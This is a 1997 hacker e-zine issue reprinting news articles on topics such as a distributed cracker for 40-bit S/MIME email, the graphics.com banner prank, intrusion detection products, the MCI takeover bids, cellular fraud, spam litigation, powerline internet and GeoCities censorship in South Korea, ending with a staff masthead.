by Simson Garfinkel
26.Sep.97.PDT -- Cracking encrypted email just got much easier - as long as
the message was encrypted with Netscape Navigator or Microsoft's Outlook
Express.
Bruce Schneier, a cryptography consultant based in Minnesota, has created a
Windows 95 screensaver that cracks encrypted email messages on computers that
are otherwise unused. "On average, it takes 35 days on a 166 MHz Pentium,"
said Schneier, who is also the author of the book Applied Cryptography.
The real power of Schneier's program is that it's designed to work on
multiple machines in parallel over a local-area network. Got an office with a
dozen machines? You can crack a message in a little less than three days. Got
a thousand? Your wait will be just 50 minutes. The program, which began as a
screensaver that searched for large prime numbers, will be made available on
Schneier's Web site today.
The program will only crack messages encrypted with RSA Data Security's
S/MIME mail encryption standard, and at that, only messages that are
encrypted with a 40-bit key. But that's exactly the encryption that's being
offered today by the most commonly used versions of Netscape Messenger and
Microsoft Outlook Express.
"What really pisses me off is that [these products] are being marketed as
secure," said Schneier. "The products don't say that they use 40-bit
encryption - be careful. They say this is security."
The S/MIME standard implemented by Netscape and Microsoft does provide for
higher-level security by using different encryption algorithms. But Schneier
maintains that messages encrypted with these stronger algorithms cannot be
exchanged between the two vendors' products. "The S/MIME security standard is
really hard to work with," said Schneier. "None of [the products]
interoperate at any level other than 40-bit RC2."
Schneier says he's releasing his program to demonstrate the fundamental
vulnerabilities in the S/MIME standard. But S/MIME's maker disagrees, saying
there is no problem using longer keys.
"Bruce is mistaken," said Scott Schnell, vice president of marketing for RSA
Data Security, the co-author of the S/MIME specification. "We have mail
messages on file in our interoperability test lab which demonstrate
interpretability between Outlook Express and Netscape's Messenger using
triple-DES," which has a 168-bit key.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Webmaster Lets Sites Hack Themselves
by Mike Tanner
25.Sep.97.PDT -- When A.H.S. Boy secured the domain graphics.com this month
for a nonprofit Web resource for graphic designers he was building, it
seemed like a real coup for his nascent site. That is, until the address
started logging thousands of hits while it still consisted merely of an
"under construction" marker page. It soon became apparent that the flood of
links was caused by a browser quirk that caused certain kinds of badly-coded
graphics URLs to link to his domain. Boy seized upon the serendipitous
glitch as an opportunity to passively hack those sites that erroneously
linked to his, loading them with banners featuring subversive slogans.
For the past several weeks, therefore, unwary visitors to sites, including
those for such corporate and political powers as Packard Bell, Corel, and the
government of Hong Kong, have been confronted with graphics telling them,
"You are only a resource for profit" or, "Revolution is the most beautiful
word."
"Of course returning these very subversive graphics that some of these sites
are getting, probably won't make the owners of these sites very happy," says
Boy, who runs sites for a situationist organization, an Austrian arts group,
a bookstore, and his own shareware business off the same server. To show
there's no ill-will intended, however, he puts the URL to his site on all the
banners, and offers a page explaining how to fix the broken links.
Since many webmasters put their graphics files in a folder labeled
"graphics," the "hack" takes advantage of intelligent browsers' default
tendency to interpret "graphics" in badly-coded links as "www.graphics.com."
The problem is exacerbated when visitors to a site mistype its URL with a
question mark instead of a slash. Boy says that almost half of his server's
current traffic of 1,500 daily hits are from these errors.
When this plethora of hits began showing up on his site, Boy simply adapted a
randomized error-page system he had designed for avoiding static 404 messages
on his own site. Now when graphics.com gets a graphics request, a CGI script
randomly serves up one of 11 slogans.
Netscape spokesman Christopher Hoover says this is the first time his company
has heard of this kind of problem associated with their browser's ability
"for resolving these kinds of conflicts" by adding .com to links - a feature
which generally provides a useful coding shortcut. He says it's a quirk
that's due to the near ubiquity of "graphics" as the name for the folder
holding a Web site's art files, and that there's unlikely to be another
domain name of similar vulnerability.
Despite Boy's efforts to help sites remedy the underlying code problems, his
prank has provoked a number of mystified and angry messages from surfers and
site administrators. One "irate webmaster" from a computer reseller's site
even threatened to alert the FBI's computer security division, but so far no
legal actions have been taken. And Boy isn't particularly worried that they
will be, since he never touches anybody else's site. "Their servers are
hacking mine," he says. "I'm just controlling it."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
High-Tech Burglar Alarms Expose Intruders
09/18/97
By Rutrell Yasin, InternetWeek
If you're not thinking about installing "burglar alarms" on your network,
chances are you will soon.
An emerging class of high-tech intrusion detection systems -- also known as
burglar alarms -- promises to alert IT administrators when their network
security is breached by unauthorized intruders.
Security companies such as Axent Technologies, Internet Security Systems,
Intrusion Detection, and the WheelGroup are shipping tools that give
corporations a layer of defense that goes beyond the firewall. Network
General earlier this month became the first networking vendor to enter the
fray with CyberCop, a tool that monitors networks for external and internal
attacks.
"Firewalls are very important. They can be very effective, but they can't do
everything. They can be circumvented," said Richard Power, director of
research and publications at the Computer Security Institute, in San
Francisco.
Firewalls protect gateways to the network, but in today's complex Web of
private networks, intranets and extranets, the Internet is not the only
entrance to the network, Powers said.
Firewalls are usually placed in front of Internet access links, wide-area
links, and dial-in servers to monitor the protocols and services that flow in
and out of a network. But they cannot tell when security has been breached,
and they tend to slow network performance when they are deployed in internal
networks.
Working In Perfect Harmony
Intrusion-detection systems complement firewalls by monitoring the network
and performing real-time capture and analysis of packet headers and content
data.
Using sophisticated algorithms to recognize attacks, intrusion-detection
systems can send alerts to administrators to warn them of possible break-ins.
Some products can even stop intruders from breaking into the network.
In the past, intrusion detection was a very labor-intensive, manual task,
said Jude O'Reilley, a research analyst at Gartner Group's network division,
in Stamford, Conn. "However, there's been a leap in sophistication over the
past 18 months," and a wider range of automated tools is hitting the market,
he said.
Network General's intrusion-detection system draws on the company's
experience in delivering packet-level analysis systems -- such as the popular
Sniffer analyzer -- to provide a network-based security system, according to
Katherine Stolz, product manager for Internet security systems at Network
General, in Menlo Park, Calif.
CyberCop uses algorithms from the San Antonio-based WheelGroup and consists
of sensors, a management server, and a Java-compliant browser. Sensors
capture data packets and analyze them for suspicious behavior. Data packets
are saved in an "Evidence Trace File" to record attackers' footprints as they
move around the network.
Sensors pass off events to the management server, which sends alarms via
E-mail, pager, or SNMP traps, alerting security administrators to take
action. CyberCop's closest competitor is Internet Security Systems'
RealSecure software, which includes an attack recognition engine that ferrets
out suspicious behavior. "The trickiest part is understanding attacks," said
Patrick Taylor, vice president of marketing at Atlanta-based ISS.
RealSecure -- which has received good reviews for the breadth and range of
attacks it can discover -- brings a more server-based approach to intrusion
detection. "Depending on the network topology, having a box on a network
segment doesn't work for everyone. Some users need to monitor the activity
of servers," Taylor said.
ISS' strategy is to sell its technology to other vendors. During the next six
to 12 months, RealSecure will be embedded in many of the leading firewalls,
switches, and servers, he said.
Not The End-All
Intrusion-detection systems hold a great deal of promise for security
administrators, but like firewalls, they do not solve all security problems,
CSI's Powers cautioned. At this stage, "intrusion-detection systems detect
only what they know to look for," he said. In the future, vendors will offer
tools with expert systems capabilities that can detect suspicious behavior,
he said.
Intrusion-detection tools are aimed at vertical markets such as financial,
telecommunications, government, and military organizations.
To be successful in the mainstream market, the tools will have to be
inexpensive, easy to use, and able to support intranet applications and
popular workstation platforms such as Windows NT, Gartner's O'Reilley said.
Firewall vendors -- which are now offering aggressively priced, plug-and-play
systems -- can serve as a good model for aspiring intrusion-detection
vendors, O'Reilley said. Intrusion-detection tools can cost anywhere from
$40,000 to $50,000, but prices are likely to drop during the next 18 months,
he said.
©CMP Media, 1996.
_____________________________________________________________
WorldCom Bid Threatens BT-MCI Merger
By Douglas Hayward, TechWire
LONDON -- MCI's mega merger with British Telecom could be abandoned,
following a counterbid for the U.S. long distance carrier by WorldCom.
The aggressive and acquisitive WorldCom offered MCI shareholders $41.50 a
share Wednesday morning, more than the equivalent of $34 a share BT proposes
to pay. The bid values MCI at $30 billion -- 41 percent more than the
company's $21 billion price tag at close of markets Tuesday, WorldCom said in
a statement Wednesday.
The combined group, which would be 25 percent owned by MCI's current
shareholders, would have revenues of some $30 billion, WorldCom added.
BT shares were up 9 percent at midday Wednesday on news of the bid, which
could net BT a healthy profit on its 20 percent stake in MCI. BT had no
comment to make on the bid early Wednesday afternoon.
WorldCom has acquired 40 companies in the past five years, including Internet
carrier MFS. Acquiring MCI will boost the combined group's earnings by up to
22 percent and cut its costs by $2.5 billion in the first year after the deal
closes, WorldCom said.
WorldCom chief executive Bernard Ebbers attempted to boost his company's
chances by saying that joining WorldCom made better business sense for MCI
than being snatched up by BT. The deal would result in savings for the
combined group of roughly $5 billion in the fifth year of the new group's
existence, he added.
"While MCI and British Telecom are both great companies, the fit between them
just doesn't work without sufficient local network assets in place," said
Ebbers in a letter to MCI chairman Bert Roberts. Because WorldCom has those
assets in place, far greater synergies than BT can offer are possible, he
said. "It is clearly a superior fit and, as a result, a superior offer,"
Ebbers said.
WorldCom is trying to exploit the fact that BT was recently forced to lower
its bid for MCI, after the American carrier disclosed it was losing more
money than it had previously thought in its attempt to break into the local
phone market in North America.
Ebbers also appealed to MCI's sense of patriotism. "Our two companies are the
paradigm for the American entrepreneurial spirit," he said. "We have both
forged significant in roads into industries long dominated by giants, and
have been among the first to offer consumers a choice of providers for local,
long distance, data, and other services."
Although BT shares rose dramatically Wednesday morning, the euphoria in
London could be short-lived. If the bid succeeds, it could destroy BT's
international strategy, which is heavily dependent on its alliance with MCI,
particularly in Latin America.
Concert, the international joint venture of BT and MCI, has secured several
major customer contracts and alliances with leading telephone operators
including Telefonica de Espana and Portugal Telecom. Those contracts are at
risk if the WorldCom bid succeeds.
Copyright (c) CMP Media, 1996.
_____________________________________________________________
U.S. cell phone industry battles service thieves
October 1, 1997
By Brad Liston
ORLANDO, Fla. (Reuter) - Thousands of cellular telephone users have had the
unfortunate experience of opening their monthly bills and finding hundreds
of dollars in charges for calls they did not make.
The good news for them is that such fraud is way down, according to delegates
to a conference of the U.S. wireless telephone industry Wednesday.
But the bad news is that wireless thieves are getting more sophisticated.
"The criminal customer will never go away," warned Roseanna DeMaria, vice
president for business security at AT&T Corp. Wireless Services.
"He'll just
engage in some very creative R&D."
At the Cellular Telecommunications Industry Association's Fraud '97
conference, industry leaders said the theft of wireless services in 1996 had
dropped to 3 percent of annual revenues.
In the early 1990s, that number was 6 percent.
There currently are about 50 million wireless customers in the United States.
Before 1995, stealing a cell phone signal was a simple as standing outside a
shopping mall in an area with heavy cellular traffic and picking up a signal
that could be reprogrammed into another phone to make it look as if its calls
were coming from a legitimate account.
New technologies are making that more difficult, said Thomas McClure, the
association's director of fraud managment.
For example, wireless service providers can now match an electronic serial
number unique to a digital wireless phone with another identification number
unique to each account in a system similar to the military's "friend and foe"
technology. If someone uses an account on an unauthorized phone, he trips a
computer that alerts the service provider.
Thanks to that technology, called radio frequency fingerprinting, cellular
thieves who could once promise service for 30 days before phone companies
caught on now can promise only about three days.
For older analog phones, the industry is becoming more adept at spotting
changes in customer patterns. "If your account suddenly shows, say, three
calls a day to Bangladesh, then a computer will recognize that, and someone
will contact you to confirm the calls," McClure said.
Law enforcement sources say the ranks of cellular thieves include the usual
suspects -- drug smugglers, organized crime figures and criminal fugitives,
among others.
"The professional criminal is clearly going after our service," McClure said.
"He wants to become the invisible man."
So where do criminals, whose expertise may lie more along the line of cutting
cocaine or breaking thumbs, find people sharp enough to steal cutting-edge
technology?
"They recruit it," Jeff Nelson, spokesman for the Cellular Telecommunications
Industry Association, said. "We're up against some of the best minds in the
nation."
(C) Reuters Ltd. All rights reserved.
_____________________________________________________________
Junk Mail Giant Cyber Promotions Is Back Online
By Bill Pietrucha
WASHINGTON, DC, U.S.A., 1997 OCT 3 (NB) -- Cyber Promotions Inc., the online
junk mail giant, has been reconnected to Internet service provider Apex
Global Internet Services (AGIS).
"We just went back up in the past hour," a Cyber Promotions spokesperson told
Newsbytes. "We're not fully functional yet, but we are back online."
Earlier today, Cyber Promotion still was not reconnected to AGIS, despite a
ruling last Tuesday that AGIS must reconnect Cyber Promotions until October
16. Earlier this week, Cyber Promotions also posted a $12,500 bond ordered by
Judge Anita Brody of the US District Court in Philadelphia to pay for any
possible damage to AGIS' network caused by "anti-spam" spam attacks against
both Cyber Promotions and AGIS for providing service to Cyber Promotions.
This past Tuesday, Judge Brody granted Dresher, Pennsylvania- based Cyber
Promotions a temporary preliminary injunction, forcing AGIS to reconnect the
bulk e-mail provider to their service. Brody's ruling said that the contract
between AGIS and Cyber Promotions requires AGIS to issue a 30 day notice
before terminating service.
"We obviously are not pleased with the court's ruling," AGIS CEO Phillip
Lawlor said after the ruling. "We are not happy with the court's decision,
but we must abide by it."
Lawlor, who said he regretted ever taking Cyber Promotions on as a client,
said Cyber Promotions told the court it is looking for other Internet Service
Providers to handle the junk mail account.
Lawlor also left the door open for Cyber Promotions, saying AGIS "is looking
at all options" regarding October 17, the date AGIS can again disconnect
Cyber Promotions.
"We'll decide between now and that time what is the best course of action to
take," Lawlor said.
AGIS counsel Philip Katauskas, however, said, "our actions to date say we
don't want them on our network."
In late September, the Dearborn, Michigan-based AGIS, the nation's fourth
largest carrier of Internet traffic, disconnected several unsolicited, bulk
e-mailers, including Cyber Promotions Inc., "for security reasons."
"The attacks were of a nature which not only threatened portions of our
global, public network, but other parts of the Internet as well," Lawlor
said. "Our engineers simply followed AGIS standard security procedures in
shutting their service down."
Reacting to the shut-off of service, Cyber Promotions filed suit against AGIS
in US District Court in Philadelphia for allegedly breaking its distribution
contract. US District Court Judge Brody, citing the breach of contract by
AGIS for shutting down Cyber Promotions' connection without warning, said in
her ruling that "the fact that Cyber is an unpopular citizen of the Internet
does not mean that Cyber is not entitled to have its contracts enforced in a
court of law or that Cyber is not entitled to such injunctive relief as any
similarly situated business."
©1997 Newsbytes
_____________________________________________________________
Electric Outlets Could Be Link To the Internet
By Gautam Naik
The Wall Street Journal
10/07/97
LONDON -- Engineers claim to have developed a breakthrough technology that
would let homeowners make phone calls and access the Internet at high speeds
via the electric outlets in their walls.
If the technology developed by United Utilities PLC and Northern Telecom Ltd.
proves commercially viable, it could transform power lines around the world
into major conduits on the information superhighway. Because electricity
flows into virtually every home and office the new technology could give
power companies easy entree into the phone and Internet access businesses,
thus posing a serious threat to current providers of those services.
Both United Utilities, a power company, and Northern Telecom, a Canadian
maker of telecom gear, confirmed that their system was "ready for the mass
market," but declined to reveal details until a news conference scheduled for
tomorrow. A Northern Telecom spokesman also declined to elaborate.
While the technology must still be proven on a large scale, the two companies
have tested telephone service over power lines in about 20 U.K. households
over the last 12 months -- with positive results, according to Alistair
Henderson, chief of technology at Energis PLC, the telecom unit of National
Grid Group PLC, which owns and operates the electricity-transmission system
in England and Wales. Energis, one of several power companies that has
secretly worked with United Utilities on the "power line telephony" project,
hopes to use the system to offer data services to its own business customers.
"It's very good news for utilities, indeed," says Mr. Henderson. "Everybody
has an electricity line to their homes, and every business has electric
supply. "At long last, the local monopoly of the incumbent telecom operators
is about to be demolished."
But some questions remain. Although United Utilities' initial tests have been
successful, technical and safety wrinkles have to be ironed out. There's also
likely to be intensifying competition from a host of other wanna-be phone and
Internet service providers, including cable companies and outfits that use
wireless technology to provide high-speed access. And for the new system to
be commercially feasible, a power utility would have to sign up 40% or more
of homes and offices in a particular neighborhood, Mr. Henderson says.
This could prove a difficult task as existing telecommunications players have
proven to be adept at making life hard for new entrants. The Baby Bells in
the U.S., for example, have largely thwarted efforts by AT&T Corp. and MCI
Communications Corp. to enter the local telephone business.
In recent years electric utilities in the U.S. and Europe have been trying to
enter the telecom fray by the more conventional method of stringing
fiber-optic cables along power lines. But so far they've had limited success.
As a result, utilities have waited for exactly this kind of breakthrough to
make a big splash in the telecom wars.
While electric lines have been used before to zap tiny amounts of data
between computers, their capacity has always been limited, making commercial
applications unfeasible. Now United Utilities' telecom arm, Norweb
Communications, has found a way to transmit data at a speed of more than 384
kilobits per second over regular electricity lines -- more than 10 times the
speed of Internet modems used by most households with regular telephone
lines.
The advantage of the latest system -- which uses cellular phone technology to
transmit signals along electric wires -- is that utilities needn't spend vast
amounts of to build new telecom infrastructure, since existing power lines
can simultaneously transmit both electricity, and a phone call, say.
Electricity doesn't interfere with the phone transmission for the same reason
that a radio broadcast doesn't interfere with a simultaneous TV broadcast:
the frequencies are very different. "Utilities won't have to touch the wires
underground," notes Mr. Henderson.
Of course, there will be some cost to utilities that want to commercialize
the new technology and enter the telecom business. Utilities will have to
install a device in each residence or office to separate the electricity and
phone transmissions. From the device, one line will deliver the telephone and
Internet link, while the other will deliver electricity. In the case of the
two companies' test, Northern Telecom is believed to have built the box that
separates the power and data transmissions.
Jennifer Schenker contributed to this article.
_____________________________________________________________
Coming Soon: Net Access Through Power Lines
October 8, 1997
By Reuters
"Canada's Northern Telecom (Nortel) and Britain's Norweb Communications today
unveiled new technology allowing reliable, low-cost, high-speed access to the
Internet through the domestic electricity supply.
In a move heralding the first competition between electricity companies and
telecommunications carriers, the two groups said their patented technology
would allow power firms to convert their infrastructures into information
access networks.
Having reduced electrical interference on power lines, the companies said
they could shunt data -- and possibly voice -- over power lines into the home
at up to 1MB per second.
This is up to ten times faster than ISDN, the fastest currently available
speed for domestic computer users. Although it is slower than rival ADSL
technology being developed by British Telecommunications, which upgrades
copper wires, Norweb and Nortel's technology is much cheaper for operators to
install.
All consumers need is the equipment developed by Nortel and Norweb -- an
extra card for personal computers, some software to handle subscription,
security, and authentication services, and a small box that is installed next
to the electricity meter.
This will send and receive data and is in turn linked to a personal computer
through an ordinary coaxial cable. Peter Dudley, vice president of Nortel,
said the groups had an "absolutely spectacular" amount of interest from
electricity companies in Britain and abroad that are keen to offer the
service to consumers.
"The race is on to be first," he told Reuters. Prices will be set by
electricity companies that offer the service. But consumers currently spend
an average of 20 to 30 pounds ($48.60) per month for Internet access -- and
the new service offers permanent access without telephone costs.
"Assuming they continue to spend at that rate, it is not unreasonable to
assume that is the kind of tariffing that may be submitted," Dudley said.
The Canadian telecoms equipment maker, and Norweb, part of England's
multiutility United Utilities, said their technology was fast enough for most
future domestic or small office applications and was cost effective enough to
allow operators returns on investments. "As one of the first practical, low
cost answers to the problem of high speed access to the Internet, this
technology will unleash the next wave of growth," Dudley said.
The two companies have developed a "specialized signaling scheme" that allows
them to carry data traffic between local power substations and homes,
effectively turning the electricity supply into a communications network.
Each substation is then linked by fiber-optic circuits to a central switch --
and from there into the worldwide computer network.
After 18 months of refining and upgrading a prototype and promising "oodles
of bandwidth," the companies said they planned to market the technology in
Europe and the Asia Pacific region. "We are ready to ship in volume," said
Ian Vance, vice president and chief scientist at Nortel Europe.
Banking on high growth and good economic returns, Norweb hopes to attract
around 200 customers in a marketing pilot in northwestern England in the
second quarter of 1998 before rolling out the service."
_____________________________________________________________
GTE Makes $28B Cash Offer For MCI
By Kora McNaughton, TechInvestor
GTE made a $28 billion, all-cash bid Wednesday to acquire MCI, bringing to
three the number of suitors pursuing the long-distance carrier.
The latest offer, which values MCI stock at $40 a share, follows WorldCom's
$30 billion bid, made two weeks ago. The proposed stock deal from Jackson,
Miss.-based WorldCom would give MCI shareholders $41.50 per share.
The first suitor, British Telecom, needed only final shareholder approval for
its $23 billion marriage to MCI when WorldCom made its higher bid.
But now GTE is in the game. CEO Charles Lee offered MCI Chairman Bert Roberts
the chairmanship of the merged company, which would be headquartered in
Washington, D.C., where MCI is located.
Lee said his company would also consider a cash and stock deal rather than an
all-cash acquisition.
In a letter to Roberts, Lee said a merger would create a company with more
than $40 billion in annual revenue, more than 21 million local and 24 million
long-distance lines, and 5 million wireless customers.
In addition, Lee continued, it would result in more efficient operations and
new revenue opportunities. "No two companies in the industry today are more
complemenetary or better situated to expand the availability and breadth of
bundled service offerings to local, national and international customers,"
the letter read.
GTE also said it is willing to negotiate a continued relationship with
British Telecom if its offer is accepted.
MCI said its board "will meet shortly to review all issues and options with
respect to the GTE proposal and the unsolicited proposal received from
WorldCom, in the context of the company's strategic merger agreement with
BT."
But the BT deal isn't likely to happen, analysts said.
"MCI is in play now," said Steve Shook, an analyst with Interstate/Johnson
Lane in Charlotte, N.C. "This is just one more nail in the coffin for BT."
British Telecom had planned to pay about $23 billion, a price that was
reduced after MCI revealed last summer that it would incur hundreds of
millions of dollars in losses trying to enter the local phone market this
year.
The prospect of another uninvited guest at the MCI bidding party sent shares
of MCI, British Telecom, WorldCom, and GTE in opposite directions Wednesday.
Trading of MCI and GTE shares was suspended around 1:00 p.m., but MCI [MCIC]
shares resumed trading an hour later and closed up 1 9/16 to 36 7/8. GTE
[GTE] was up 2 3/16 at 48 before the suspension of trading.
Shares of British Telecom [BTY], which owns a 20 percent stake in MCI,
climbed 2 11/16 to 75, while WorldCom [WCOM] fell 1 5/16 to 35 7/16.
MCI's board had been considering WorldCom's offer but had not yet made a
decision about whether to abandon the BT deal. Shareholder approval is still
needed for any merger, whether it is with BT, WorldCom, or GTE.
Shook said the WorldCom offer remains the best of the bunch.
Although GTE's offer is all cash, "it's not like you're getting a junky stock
with WorldCom," he said. "You're getting really good currency. WorldCom has
always delivered on what they said."
But if the prospect of a merged WorldCom-MCI was more appetizing to analysts
than the BT deal, the advantages over GTE's proposal are not so clear.
BT has no presence in the U.S. local phone market, which MCI has been trying,
with little success, to penetrate. WorldCom has a limited local business,
while GTE already provides local service in 29 states.
GTE is also a contender in the race to provide one-stop shopping for
communications services, including local and long-distance calling as well as
data services such as Internet access. Last May, GTE bought Internet access
provider BBN, and it has a strategic alliance with Cisco to develop enhanced
data and Internet services.
Earlier Wednesday, GTE reported third quarter profits of $756 million, or 79
cents a share, beating Wall Street estimates of 77 cents per share, as
reported by First Call.
During the quarter, consolidated revenue was up 11 percent to $5.94 billion,
compared to $5.34 billion in the third quarter last year. The 11 percent jump
includes $127 million from GTE's acquisition of BBN.
Excluding the $127 million of new revenue related to BBN, sales grew 8.8
percent.
"These results illustrate our success in positioning GTE for the future,"
said GTE CEO Charles Lee. "The BBN acquisition, completed during the quarter,
represents the cornerstone of GTE's strategy to become a dominant player in
the data market."
©CMP Media, 1997.
_____________________________________________________________
GeoCities Sites Blocked In South Korea
10/22/97
By John Borland, Net Insider
In the second such instance of international censorship leveled at the
company this year, all sites on the sprawling GeoCites network of Websites
have been blocked in South Korea.
Company officials confirmed Wednesday that the South Korean government asked
the agency that handles network traffic in that country to block access to
all GeoCities sites by South Korean citizens. The request came in reaction to
a single pro-North Korean site on the GeoCities network.
"Unfortunately they are blocking access to over a million sites," said
GeoCities spokesman Bennett Kleinberg, of Edelman Public Relations Worldwide.
"GeoCities has issued a letter to the Consulate General
asking that they
look into the situation."
The company first learned of the blockage on Oct. 12, through an E-mail from
a user, Kleinberg said. After examining the offending page, the company
determined that it did not violate the contract that all GeoCities
"homesteaders" must sign, and decided to let it remain online.
The page, sponsored by a group calling itself the Australian Association for
the Study of the Juche Idea, praises North Korean philosophy and leadership.
Juche, it says, is an concept developed by late North Korean President Kim Il
Sung focusing on self-reliance and national independence.
Korean officials at the country's San Francisco Consulate said they did not
have enough knowledge of the situation to comment.
The action is the second time this year that GeoCities sites have been
unavailable to an entire country of users. In June, the Malaysian government
asked the country's single Internet service provider to block access to
GeoCities, again because of a single site that was critical of the
government. In that case, however, GeoCities determined that the site's calls
for "insurrection and revolution" had violated the service's terms of
agreement, and quickly took it offline.
"We reserve the right to pull any site at any time" that has violated the
service's contract, Kleinberg said. "But at this point the determination has
been made that [the pro-North Korean site] hasn't done that."
The action was not unexpected coming from the current South Korean
leadership, said Stanton McCandlish, program director at the Electronic
Freedom Foundation. The government has repeatedly shut down South Korean
Websites disseminating pro-North Korean information, he said.
"They [South Korean Leadership] are used to being able to unilaterally ban
things," McCandlish said. "The Internet is not a medium that can be
effectively censored. It's a hard lesson for them to learn."
As of Wednesday, GeoCities had not heard back from the Korean government,
Kleinberg said, but hoped to resolve the situation though normal trade and
diplomatic channels.
©CMP Media, 1997.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: thtj communications, inc.³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Editor-in Chief: Scud-O, scud@thtj.com
Executive Editor: KungFuFox, kungfufox@thtj.com
Submissions Editor: Keystroke, submissions@thtj.com
Distribution Editor: Malhavoc, malhavoc@thtj.com
Site Manager: Scud-O, scud@thtj.com
Special Features Editor:
Content Editors: FH, fh@thtj.com
Phrax, phrax@thtj.com
Shok,
Staff Writers: memor, memor@thtj.com
ArcAngel, arcangel@thtj.com
lurk3r,
Shok,
The Messiah,
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
³ Where It's At ³
On Undernet:
#phreak
#hackphreak
#hackers
#carparts
On EFNet:
#linuxos
#phrack
#sinnerz
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
A-th-a-th-a-th-a-that's all folks!
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: - End of Communique - ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
